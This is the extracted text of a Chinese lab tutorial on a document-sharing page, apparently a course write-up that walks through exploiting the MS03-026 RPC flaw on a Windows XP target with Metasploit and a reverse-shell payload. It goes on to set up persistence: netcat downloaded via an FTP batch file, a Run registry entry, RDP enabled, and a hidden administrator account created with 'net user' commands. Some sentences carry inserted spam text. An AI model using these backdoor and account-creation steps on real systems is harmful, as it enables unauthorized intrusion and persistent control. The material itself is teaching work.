- 1、本文档共23页,可阅读全部内容。
- 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 5、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 6、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 7、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 8、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
第四步:添加账号,提升权限netuserzmx123/add添加用账号【用户名zmx,密码123】一般用户netlocalgroupadministratorszmx/add提升为超级管理员权限这里是用之前的bat文件创建的账号第五步:攻击结果使用netcat连接后门“nc.exe06500”实现远程桌面登录系统漏洞渗透攻击MS03-026漏洞渗透漏洞概况发布日期:2003-07-16更新日期:2003-07-17受影响的系统:MicrosoftWindowsNT?4.0?
MicrosoftWindowsNT4.0TerminalServicesEdition?
MicrosoftWindows2000?
MicrosoftWindowsXP?
MicrosoftWindowsServer?2003不受影响的系统:MicrosoftWindowsMillenniumEditionMS03-026漏洞渗透详细描述:远程过程调用(RemoteProcedureCall)是用于视窗操作系统的一个协议,RPC提供进程间交互通信机制,允许在某台计算机上运行程序无缝的在远程系统上执行代码。协议本身源自OSFRPC协议,但增加了Microsoft特定的扩展。远程过程调用在处理TCP/IP以上的信息交换中存在缺陷。该缺陷源于不正确处理畸形信息,直接影响使用RPC协议的DCOM接口,监听TCP/IP端口135。该接口处理由客户端机器发送给服务器的DCOM对象激活请求(如UNC路径)。攻击者利用该漏洞能在受影响的系统上以本地系统权限运行代码,能执行任何操作,包括安装程序,查看、更改或者删除数据,或者建立系统管理员权限的帐户。攻击者要利用该漏洞实现攻击,必须通过135端口向远程计算机发送一个特制加工的请求。解决方法:升级补丁以修复这个安全问题渗透环境Windows攻击机WinXPattacker05XP靶机WindowXPprofessional06第一步:网络扫描使用Nessus扫描WindowsMetasploitable靶机最后一项就是MS03-026漏洞。第二步:远程渗透攻击通过Metasploit攻击MS03-026漏洞,获得远程访问权在攻击机上运行Metasploit,可以查找到攻击漏洞MS03-026的exploit(windows/dcerpc/ms03_026_dcom)以及一个可用的payload(generic/shell_reverse_tcp)。其中,该payload的作用是让靶机返回一个命令行。在攻击机上键入以下命令,对靶机进行攻击。关键参数********************************use和setPAYLOAD,设置使用的exploit以及payload。setRHOST和setLHOST分别为设置靶机IP以及攻击机IP。********************************最后通过exploit命令进行攻击。攻击成功后我们获得了靶机的一个命令行。第三步:攻击文件--靶机编写FTP批处理文件,下载攻击文件获得了靶机的命令行后,先在C盘创建一个文件夹hidennc,这是存放后门创建所需文件的文件夹。打开靶机进入C盘,发现如图所示。靶机注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run位置初始状态,如图所示。从攻击机要上传到靶机的攻击文件,如图所示。之后通过echo和管道,创建ftp命令列表,接着使用ftp命令执行该命令列表command.txt,进而达到从特定的ftp服务器下载所需文件到靶机的目的。靶机状态,如下图所示。攻击文件的获取方式:nc.exe在攻击机WinXPattacker里面C盘有哪些信誉好的足球投注网站即可。AddReg.bat内容3389.bat内容hiddenAcount.bat内容在攻击机中的靶机命令行里执行批处理文件进行相应的操作。靶机注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run位置被添加自动运行项,如图所示。靶机的3389端口打开,远程桌面被开启
文档评论(0)